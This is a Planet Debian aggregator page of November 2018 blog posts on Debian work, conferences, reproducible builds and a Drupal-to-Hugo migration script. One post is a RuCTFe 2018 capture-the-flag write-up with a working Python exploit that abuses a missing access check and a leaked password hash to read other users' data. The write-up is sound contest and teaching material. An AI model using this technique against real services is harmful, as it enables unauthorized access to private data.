You are here

Planet Debian

Subscribe to Feed Planet Debian
Planet Debian - https://planet.debian.org/
Përditësimi: 3 months 3 javë më parë

Visiting London

Mër, 14/11/2018 - 2:42md

I'm visiting London the rest of the week (November 14th–18th) to watch match 5 and 6 of the Chess World Championship. If you're in the vicinity and want to say hi, drop me a note. :-)

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Alerts in Weblate to indicate problems with translations

Mër, 14/11/2018 - 2:15md

Upcoming Weblate 3.3 will bring new feature called alerts. This is one place location where you will see problems in your translations. Right now it mostly covers Weblate integration issues, but it will be extended in the future for deeper translation wide diagnostics.

This will help users to better integrate Weblate into the development process giving integration hints or highlighting problems Weblate has found in the translation. It will identify typical problems like not merged git repositories, parse errors in files or duplicate translation files. You can read more on this feature in the Weblate documentation.

You can enjoy this feature on Hosted Weblate right now, it will be part of upcoming 3.3 release.

Filed under: Debian English SUSE Weblate

Michal Čihař https://blog.cihar.com/archives/debian/ Michal Čihař's Weblog, posts tagged by Debian

Reproducible Builds: Weekly report #185

Mar, 13/11/2018 - 2:56md

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates to our Jenkins-based testing framework that powers tests.reproducible-builds.org by Holger Levsen this week (see below). The most important work was done behind the scenes outside of Git which was a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources whilst the machine had a load of 60-200. This involved temporarily removing all 1,300 jobs, disabling plugins and other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing to subprocess.run and to fix the parsing of the “issue” selector option.

This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible-builds.org/blog/ reproducible-builds.org

Results produced while at "X2Go - The Gathering 2018" in Stuttgart

Hën, 12/11/2018 - 3:25md

Over the last weekend, I have attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there, I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accomodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

Especially, a big thanks to everyone, that I was allowed to bring our family dog "Capichera" with me to the event. While Capichera adapted quite ok to this special environment on sunny Friday and sunny Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk interact).

For those interested and especially for our event sponsors, below you can find a list of produced results related to the gathering.

light+love
Mike

2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)
  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb-1.3.0.0 branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.
2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)
  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as first argument, so now I can now also take down the autossh tunnel for SMTP (as opposed to doing killall autossh unspecifically).
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: : Prepare nearly vegan (the carrots had butter), organic Italian pasta (with salad and ciabatta bread) for the group. Together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-cli: Add check directly after authentication that exits with error, if the remote server has the X2Go Server software installed. Bail out, if not.
  • X2Go Consulting: Demo possible approach for having X2Go in the webbrowser again to Martti Pikanen.
2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)
  • Debian: Port pinentry-x2go to Qt5, upload to unstable pinentry-x2go 0.7.5.9-3.
  • X2Go: Apply changes on top of pinentry-x2go 0.7.5.10 upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started
References sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

Review: The "Trojan Room" coffee

Hën, 12/11/2018 - 1:20md

I was recently invited to give a seminar at the Cambridge University's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background, to save hackers in the building from finding the coffee machine empty, a camera was setup on the local network in 1991 using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001 what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in myself? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Achievement unlocked! I spoke at PythonBrasil[14]

Hën, 12/11/2018 - 3:49pd
PyLadies (and going to PythonBrasil)

PythonBrasil is the national Python community conference that happens every year, usually in October, in Brazil.

I attended PythonBrasil for the first time in 2016, the year we had started PyLadies Porto Alegre. Back then, we were a very small group and I was the only one to go. It was definitely one of the best experiences I ever had, which, of course, set a very high standard for every single tech event I attended afterwards.

Because of the great time I had there, I wanted to bring more and more women from PyLadies Porto Alegre to experience PythonBrasil in the next editions. So, during the PyLadies Porto Alegre 1st birthday party, I encouraged the other women to submit activities to try and to go to the conference that would happen in Belo Horizonte.

When attending it for the second time, I didn't go alone. Daniela Petruzalek had her talk accepted. Claudia, also from PyLadies Porto Alegre, was able to go, for the first time, thanks to the support of the PyLadies Brazil crowdfunding campaign. To me, one of the most memorable things about this PythonBrasil was "The (unofficial) PyLadies House", where I stayed. It was a huge house that we rented and shared between about 18 people to help with the accomodation costs for all of us. We shared breakfasts and rides and stories. We watched other PyLadies rehearse their talks, made lightning tech talks late at the night and we even had a birthday party!

So, this year? The idea of encouraging PyLadies POA submissions, something that had came up almost spontaneously last year, matured and we have worked to make Pyladies Porto Alegre 2nd Birthday Party an all-day event with that purpose. The schedule? Lightning talks about Python projects from its members, talks about experiences as participants and as speakers at Python Brasil and... we also had a help from Vinta Software's Flavio Juvenal, who acted as mentor to the women who were considering to submit an activity to PythonBrasil. He even made a great Github repo with a proposal checklist to assist us - and he made himself available for reviewing the proposals we wrote.

The result? We had more than 6 women from PyLadies Porto Alegre with activities accepted to PythonBrasil[14]. Some of them even had more than one activity (tutorial and talk) accepted.

I was among the ones who had been accepted. Ever since attending the conference for the first time, it had been a goal of mine to give a talk at PythonBrasil. But not any talk. I wanted for it to be a technical talk. At last, what I learned during Outreachy and how I had used it for a real task in a job finally gave me the confidance to do so. I felt ready, so I submitted and I was accepted.

I made my way to Natal, the capital of the Rio Grande do Norte (RN) state (in the Northeast of Brazil) two days before the conference was to start, since it was the cheapest ticket I could find. Besides, the PyLadiesBRConf was scheduled to happen on the day before and I was hoping I would be able to attend. PyLadiesBRConf was a full day of talks organized by what one could have called "the original PyLadies Brazil", since the Pyladies community in Brazil actually started in Natal and was named so (afterwards we started naming the group with cities' names).

The PythonBrasil[14] conference

On the next day, PythonBrasil[14] started. It was the biggest PythonBrasil to happen yet, with over 700 atendees (plus staff). Like many PyCons, the conference days are usually split between tutorials, talks and sprints.

Day 1 - tutorials

The tutorials have free admitance and are open to anyone to attend (no matter if they have bought a ticket to the conference or not). Unfortunatelly, due to the capacity of the rooms where they would be held, there was a limit for 100 registrations for each tutorial. When I went to register for the tutorials of the first day, they were already all booked. Even so, the tutorial I was most interested in, "Builting REST APIs with Django REST Framework", had to be cancelled anyway because the presenter missed his flight. :( On this first day, I met with a few PyLadies and people from the Python community who were in Natal, I walked on the beach and I focused on the preparation for my talk.

Day 2 - tutorials

I must confess that I had registered for the tutorial on Pandas ("It's not witchcraft, it's Pandas", by Fernando Masanori) merely because Flavio Juvenal had mentioned Pandas on the feedback for my proposal. I had no idea what that was actually about and why would one even use Pandas. By noon on that second day, though, I was so very glad that I did (and that I got a spot in it!). I learned a bit about Pandas and I also learned about how to use Jupyter Notebooks, something I had never tried before either. I found both Pandas and Jupyter easy and interesting and I look forward to do some projects using them.

Back when we (PyLadies) were discussing submissions to PythonBrasil with Professor Masanori, Data Structures was something that both I and another PyLady (Debora) had mentioned we had been meaning to focus on and study more. So, he came up with the idea for a tutorial about it, called: "Data Structures are <3".

On this tutorial, I found it quite interesting learning and playing with recursive functions and with algorithms for searching. I was quite impressed with learning about heapsort (who knew doing such a thing could be so cool?).

Image Licensed CC BY-SA 3.0 Attribution: RolandH

Everything at PythonBrasil (tutorials, talks and sprint) happened in the same hotel. So, after the tutorials were over, I hung around with some of the people of the community who were staying at the same hostel. The organizing team asked for help in putting together the conference kit (bag, t-shirt, IDs and flyers). We made sort of a production line and cut the time considerably short for the volunteer team.

Afterwards, I was still processing everything that I had learned and I wanted to try the new things, so I went back to the hostel to code some more. I confess that I was so hooked that I stayed up until 2 am to create the code with Pandas that I would incorporate in my talk as a bonus content.

Day 3 - talks

On this day, I had the opportunity to meet and socialize with a lot of people who were coming to Python Brasil for the first time. It was particularly delightful to see a lot of students from a public technical school (Instituto Federal) attending the conference with their teachers. They had been given tickets, which allowed them to attend the (otherwise very expensive) conference and I must say that this is the kind of inclusion that I always want to see in tech events.

From the talks, I want to highlight these moments: I learned about Scrapy (which I have been playing around a bit since then), I watched an awesome talk about using Python with Physics (although I don't have a depth knowledge of Physics, I count as a success that I could follow the talk in it's entirety, so cheers to the presenter, Ana Maria, from PyLadies Teresina) and I must mention that I was quite impressed by Elias Dorneles' talk - about developing software for the command line. Even his "slides" were made there - and there was drawings and music too, all made with Python and using the command line!

Day 4 - talks

The second day of talks brought us the much needed talk about AfroPython, a initiative that was created to increase representation of black and native brazilian people in our community.

A talk that gathered a lot of attention (and overcrowded the room it was being given at!) was the one about using Python to understand data about suicides to help preventing them. It's a hard subject for many people, but it is one that we definitely need to talk about.

Andreza Rocha's talk "Dear White People (from HR)" also touched a lot of people. She drew from her own experiences as a tech recruiter to question about the homogenity that we (still) have in tech. "Who are the ones who recruit the people?" she asked. "For us to be recruited, we (black people) have to be alive."

It was on this day that a violation of Python Brasil's Code of Conduct happened. After a PyLady gave her talk, a male participant used the time for questions not to ask a question, but to let's say... eulogize the woman who had given the talk... by demeaning all other women who had presented before her and weren't "technical enough" or something like that. Oh, how thick we must make our skin for us to be able to come up to a stage knowing we might to be subjected to a moment like that... I am glad the PyLady was experienced and level-headed enough to own the moment and give him the deserving come back. * sigh * (After the conference, the organization published a note about the CoC violation.)

Contrary to popular belief, yes, I did watch the last keynote of the day, even though it was Facebook's. And it did surprised me. Rainer Alves spoke about the shifts in corporate culture that happened when they merged infrastructure and development people into a "Production Engineering" departament. What I found most relevant, though, was the slide below, about "Blameless postmortens". After all, how to actually correct a malpractice or an error other than working collectivelly to figure out the way? "It's not about what you did, it's about what went wrong."

This was the day we took the official photo of Python Brazil:

It was also the day we took a picture with the women who were at the conference:

Day 5 - talks

Sunday arrived and it was time for: 'But can you open it on Excel?' Exporting to TXT, CSV and JSON with Python ("'Mas dá pra abrir no Excel?'' Exportando para TXT, CSV e JSON com Python"). The focus of my talk was how to export data to those formats using mainly the tools offered by the Python Standard Library. But, as I mentioned before, thanks to what I learned during the PythonBrasil tutorials, I was able to add some extra content and show how the export to CSV could be done with Pandas as well. I was very glad about this, even though I felt like there was so little time to go over all the content I wanted to present (I had time to go through all my slides and for a very brief demonstration, but that was it). I think it went well. I even managed to speak briefly about Free Software (since I don't use Excel, and I made my demonstration with LibreOffice).

When they opened time for questions, I explicitily said "Questions, not comments, please" hoping to avoid mansplaing or another incident like the one that had happened the day before. And I know people judged me for that, but... I am also aware they judged me more harshly because I am a woman. After all, in previous editions we have had male keynotes making the very same comment without people being offended by it.

This did not stop people from coming to talk to me afterwards with comments about their experiences anyway - that was definitely better, because I felt like I could talk to them more properly and personally about it, having more time than the 5 minutes alotted to questions and not having to answer under a full audience's scrutiny.

Other than my own talk, I would like to mention some other talks I attended. There was a talk about advanced functional programming ("Going further than map, filter and reduce"), which is something that I find interesting to have some idea about it, even though I don't quite fully grasp yet. There was also the PyLadies' talk, where a group representing each region of Brazil with a PyLadies group talked about the work we have been doing. Andressa went on for PyLadies Porto Alegre and talked about all the work we have been doing in particular regarding all the Django Girls workshops we have helped at in Rio Grande do Sul since the last PythonBrasil.

Ana Paula made a fun talk about Genetic Algorithm with Python, which uses the language to work with Biology data. Another subject that I am not very familiar with, but that I found quite interesting. And I also saw Camilla Martins live coding to run Python with Node.js on the big stage.

During the lightning talks, something amazing happened: the Instituto Federal students went up on the stage and talked about their experience at PythonBrasil using a regional sung-poetry called Cordel. It was really remarkable.

Also during the lightning talks, we had Thrycia Oliveira, a former participant of Django Girls, calling to attention the fact that we need to have spaces that are inclusive to parents in the community, in particular to moms. She said that PythonBrasil organization tried to arrange so, and she thanked them for that, but it had not been possible. I also remember when she told me about her participation in Python Nordeste (a regional conference that preceeded PythonBrasil) and how she had to alternate with her husband the days she went to, because one of them had to stay at home to watch over their kids (it wasn't really a kids-inclusive event).

This day ended with Betina's keynote "Does this algorithm have a soul?", a very relevant question for the state of software development today. Her talk spoke to me and to a lot of people in the audience and I can't picure a more welcoming community to be given to.

Day 6 - sprints

Sadly, Python Brazil had to come to an end. Day 6 happened on a Monday, and that meant that the majority of the people, including almost all the Pyladies, had already returned home. :( For personal reasons that I would rather not talk about publicly, I chose not to take part on the coding sprint to help with APyB's site. Instead, because I am looking for work, I used this day mostly for networking and applying to jobs I had heard about during PythonBrasil. I don't have wifi at home and I need to take any opportunity I can get to use the internet to send CVs and taking technical tests, so that is what I did.

Wrapping things up...

And, of course, to finish this post I ought to mention the beach... On my last two days in Natal, I was gifted with the awesomeness that it is the ocean at Ponta Negra during the full moon. There are no words to describe the beauty of it (I am sorry I couldn't take a good picture of it).

Thank you notes

I know this post ended up being extensive, but how can one summarize an experience with an event as huge as PythonBrasil? It's hard. I think it's safe to say that to be part of something like that has a lasting impact in my life. All the technical content I have heard about gives me motivation to keep studying and learning new things. All the people I have met, friends old and new, give meaning to the work to make the Python community more open and inclusive.

So, I cannot thank Outreachy enough for making my participation in Python Brasil possible!

This whole journey would not be possible without the awesome people below, so I would like to also thank:

  • My Outreachy mentors Daniel Pocock and Bruno for the support during the internship and beyond
  • Flavio Juvenal for the feedback on my proposal and giving the golden tip about Pandas
  • Andreza Rocha for not letting me give up on my dream to go to this PythonBrasil
  • Felipe de Morais and Betina Costa for sitting in the very front row and nodding when I was unsure during my talk
  • Elias Dorneles for the support when applying to Outreachy and for reviewing my slides
  • PyLadies Brazil for being the safety net so many women can rely on
Renata https://rsip22.github.io/blog/ Renata's blog

RuCTFe 2018 laberator

Dje, 11/11/2018 - 4:33md

Team: FAUST
Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

Webservice written in go. Has some pretty standard functionality (register, login, store a string) with the logic somewhat dispersed between the main webserver in main.go, some stuff in the templates and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. Also the phrase stored when creating the account was used to store some more flags.

Client side authentication for labels

Gem from the viewLabel javascript function. For some reason the label's owner is checked client-side after the data was already returned to the client.

let label = JSON.parse(e.data); if (label.Owner !== getLoginFromCookies()) { return; }

And indeed, the websocket view method checks for some valid session but doesn't concern itself with any further validation of access priviledges. As long as you have any valid session and can figure out websockets you can get about any label you like.

"view": func(ex *CommandExecutor, data []byte) ([]byte, error) { var viewData ViewData err := json.Unmarshal(data, &viewData) if err != nil { return nil, createUnmarshallingError(err, data) } cookies := parseCookies(viewData.RawCookies) ok, _ := ex.sm.ValidateSession(cookies) if !ok { return nil, errors.New("invalid session") } label, err := ex.dbApi.ViewLabel(viewData.LabelId) if err != nil { return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId)) } rawLabel, err := json.Marshal(*label) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label)) } return rawLabel, nil },

Putting things together. The exploit builds an fresh account. It generates some label (to figure out the ID if the most recent labels) and then bulk loads the last 100 labels

#!/usr/bin/env python3 import requests import websocket import json import sys import string import random import base64 def main(): host = sys.argv[1] session = requests.session() password = [i for i in string.ascii_letters] random.shuffle(password) username = ''.join(password[:10]) phrase = base64.b64encode((''.join(password[10:20])).encode()).decode() password = base64.b64encode((''.join(password[20:36])).encode()).decode() x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s' % (host,username,phrase,password)) x = session.get('http://%s:8888/login?login=%s&password=%s' % (host,username, password)) raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid']) ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,)) data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)})) # make sure create is already commited before continuing ws.recv() data = {'Offset': 0, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)})) stuff = json.loads(ws.recv()) lastid = stuff[0]['ID'] for i in range(0 if lastid-100 < 0 else lastid-100, lastid): ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,)) try: data = {'LabelId': i, 'RawCookies': raw_cookie} ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)})) print(json.loads(ws.recv())["Text"]) except Exception: pass if __name__ == '__main__': main() Password Hash

The hash module used is obviously suspect. consists of a binary and a wrapper, freshly uploaded to github just the day before. Also if you create a test account with an short password (say, test) you end up with an hash that contains the password in plain (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa) you end up with an 16 character hash that is identical. This also means the password hash is a valid password for the account.

Listening to tcpdump for a while you'll notice interesting entries:

[{"ID":2,"Login":"test","PasswordHash":"dGVzdFRpAm1IkZZVXEmK3Q==","Phrase":{"ID":0,"Value":""}}]

See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.

"last_users": func(ex *CommandExecutor, _ []byte) ([]byte, error) { users := ex.dbApi.GetLastUsers() rawUsers, err := json.Marshal(*users) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users)) } return rawUsers, nil },

So call last_users (doesn't even need a session), for all the last 20 users log in and just load all the labels. Good thing passwords are transfered base64 encoded, so no worrying about non-printable characters in the password hash.

Additionally sessions were generated with the broken hash implementation. This probably would have allowed to compute session ids.

Christoph Egger https://weblog.christoph-egger.org/ Christoph's last Weblog entries

Migrating from Drupal to Hugo

Dje, 11/11/2018 - 12:30md
TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website’s history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of html pages. Being (and still) a novice in web, my website was mostly on ideas from others. IIRC, for the bare html one, I took a lot of look wise details from Miss Garrels’ website.

First blog

My initial blog was self-hosted with a blogging software in PHP, named PivotX The website for it still works, so hopefully the project is still alive. It was pretty good a tool for the purpose. Very lean and had support for data backends in both, MySQL and flat files. The latter was important to me as I wanted to keep it simple.

Drupal

My first interaction with Drupal was with its WSOD. That was it until I revisited it when evaluating different FOSS web tools to build a community site for one of my previous employer.

Back then, we tried multiple tools: Jive, Joomla, Wordpress and many more. But finally, resorted to Drupal. What the requirement was was to have something which would filter content under nested categories. Then, of the many things tried, the only one which seemed to be able to do it was Drupal with its Taxonomy feature, along with a couple of community driven add-on modules.

We built it but there were other challenges. It was hard to find people who were good with Drupal. I remember to have interviewed around 10-15 people, who could take over the web portal and maintain it, and still not able to fill the position. Eventually, I ended up maintaining the portal by myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then, had ambitious goals to also serve an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more a limitation of RSS Feeds. But the only data import path I could find back then was to import content through RSS Feeds.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I always desired to build some skills Hands-On (that’s how the job market likes it; irrespective of the skills, it is the hands-on that they evaluate) by using Drupal both, at the employer’s community portal and my personal website.

Little did I know that running/maintaining a website is one aspect; where as extending it, is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And it is not about migrations to a different platform. Rather an upgrade from one major release to another.

Having been using Debian for quite some time, this approach from Drupal brought back memories from the past, of when using Red Hat Linux and SuSE Linux distribution; where upgrades were not a common term, and every major release of the distribution people were mostly recommended to re-install.

Similar was the case with Drupal. Every major release, many (core) modules would be dropped. Many add-on modules would lose support. Neither the project nor the community around it, was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came in with Drupal 8. It took the pain to the next level repeating the same process of dropping modules and breaking functionalities; never did I hear much of backward compatibility on this platform.

Hugo

For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS, and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had trimmed down. No more did I have outrageous ideas of building all solutions (Web, Blog, Cart) in a single platform. All I did was mostly blog and had a couple of basic pages.

The biggest problem was migration. WP has a module, that does migration. But, for whatever annoying reason, the free version of it would only pick 7 articles from the total. And it did not import comments. So the annoyance and my limitations with web technologies was still prone to with WP. This migration path did not enthuse me much: it was more like a Hindi idiom: आसमान से गिरे और खजूर में अटके

I also attempted Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module, which IIRC did not work proper. Similar was the case with Hugo, which has a module listed on its migration page, drupal2hugo, which sets a disappointment in the beginning itself.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I was able to find some kind soul share migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of comments) but not much was I in a position to wait more.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content. Now, my website is running on markdown generated with Hugo. More than the tool, I am happy to have the data available in a much standard format.

If there’s one thing that I’m missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php define('DRUPAL_ROOT', __DIR__); include_once(DRUPAL_ROOT . '/includes/bootstrap.inc'); drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); $nids = db_query('SELECT DISTINCT(nid) FROM {node}') ->fetchCol(); $nodes = node_load_multiple($nids); foreach($nodes as $node) { $front_matter = array( 'title' => $node->title, 'date' => date('c', $node->created), 'lastmod' => date('c', $node->changed), 'draft' => 'false', ); if (count($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) { $tags = taxonomy_term_load_multiple( array_column( $node->taxonomy_vocabulary_2[LANGUAGE_NONE], 'tid' ) ); $front_matter['tags'] = array_column($tags, 'name'); } if (count($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) { $cat = taxonomy_term_load_multiple( array_column( $node->taxonomy_vocabulary_1[LANGUAGE_NONE], 'tid' ) ); $front_matter['categories'] = array_column($cat, 'name'); } $path = drupal_get_path_alias('node/'.$node->nid); if ($path != 'node/'.$node->nid) { $front_matter['url'] = '/'.$path; $content_dir = explode('/', $path); $content_dir = end($content_dir); } else { $content_dir = $node->nid; } $content = json_encode( $front_matter, JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE ); $content .= "\n\n"; $tmp_file = '/tmp/node.html'; file_put_contents($tmp_file, $node->body['fr'][0]['value']); $body = shell_exec('html2markdown '.$tmp_file); unlink($tmp_file); //$body = $node->body['fr'][0]['value']; $content .= $body; $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir; mkdir($dir_name, 0777, true); file_put_contents($dir_name.'/index.md', $content); }

Ritesh Raj Sarraf rrs@researchut.com Debian Blog on RESEARCHUT

20181110-lts-201810

Sht, 10/11/2018 - 9:47md
My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today while writing this I also noticed that https://lists.debian.org/debian-lts-announce/2018/10/threads.html currently misses DLAs 1532 until DLA 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess instead we need to focus on #859123 and #859122, so that DLAs are accessable to everyone in future.

Holger Levsen http://layer-acht.org/thinking/ Any sufficiently advanced thinking is indistinguishable from madness

RcppArmadillo 0.9.200.4.0

Sht, 10/11/2018 - 9:01md

A new RcppArmadillo release, now at 0.9.200.4.0, based on the new Armadillo release 9.200.4 from earlier this week, is now on CRAN, and should get to Debian very soon.

Armadillo is a powerful and expressive C++ template library for linear algebra aiming towards a good balance between speed and ease of use with a syntax deliberately close to a Matlab. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 532 (or 31 more since just the last release!) other packages on CRAN.

This release once again brings a number of improvements, see below for details.

Changes in RcppArmadillo version 0.9.200.4.0 (2018-11-09)
  • Upgraded to Armadillo release 9.200.4 (Carpe Noctem)

    • faster handling of symmetric positive definite matrices by rcond()

    • faster transpose of matrices with size ≥ 512x512

    • faster handling of compound sparse matrix expressions by accu(), diagmat(), trace()

    • faster handling of sparse matrices by join_rows()

    • expanded sign() to handle scalar arguments

    • expanded operators (*, %, +, −) to handle sparse matrices with differing element types (eg. multiplication of complex matrix by real matrix)

    • expanded conv_to() to allow conversion between sparse matrices with differing element types

    • expanded solve() to optionally allow keeping solutions of systems singular to working precision

    • workaround for gcc and clang bug in C++17 mode

  • Commented-out sparse matrix test consistently failing on the fedora-clang machine CRAN, and only there. No fix without access.

  • The 'Unit test' vignette is no longer included.

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel http://dirk.eddelbuettel.com/blog Thinking inside the box

Trying out crostini on chromebook plus (kevin).

Sht, 10/11/2018 - 1:51pd
Trying out crostini on chromebook plus (kevin). It's an aarch64 environment, some packages are missing because of that. Feels much slower compared to termux on the same machine especially when I am installing packages, but maybe because apt is completely different.

Junichi Uekawa http://www.netfort.gr.jp/~dancer/diary/201811.html.en Dancer's daily hackings

Sal Mubarak 2075

Pre, 09/11/2018 - 5:30pd

Best wishes to one and all for a prosperous and auspicious Gujarati New Year (V.S. 2075 called sadharana.)

We have spent Diwali week this year in sunny Orlando Florida doing various touristy things. (None of which involve a certain copyright hoarding mouse I'm happy to say.) I didn't put up a [VAC] notice because I haven't really been doing anything much in Debian of late. That is something I hope to change in the coming year but I'll think about that later. Right now I'm excited about the day trip we're going to make to Cape Canaveral. So here is a picture of Apollo 12, one of the biggest fireworks Man has ever sent to the Gods on Diwali 2026. Well, the pedant in me is forced to point out the launch date was actually Labh Pancham but that's close enough.

Jaldhar Vyas http://www.braincells.com/debian/ La Salle Debain

My Free Software Activities in October 2018

Pre, 09/11/2018 - 12:42pd

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games
  • Again Yavor Doganov saved the day by porting monster-masher away from obsolete libraries like esound and gconfmm (RC, #848052, #856086, #885037). I reviewed and sponsored the package for him again.
  • Gürkan Myczko prepared a new upstream version of greed, a classic text-console game. I provided a desktop icon and sponsored the upload.
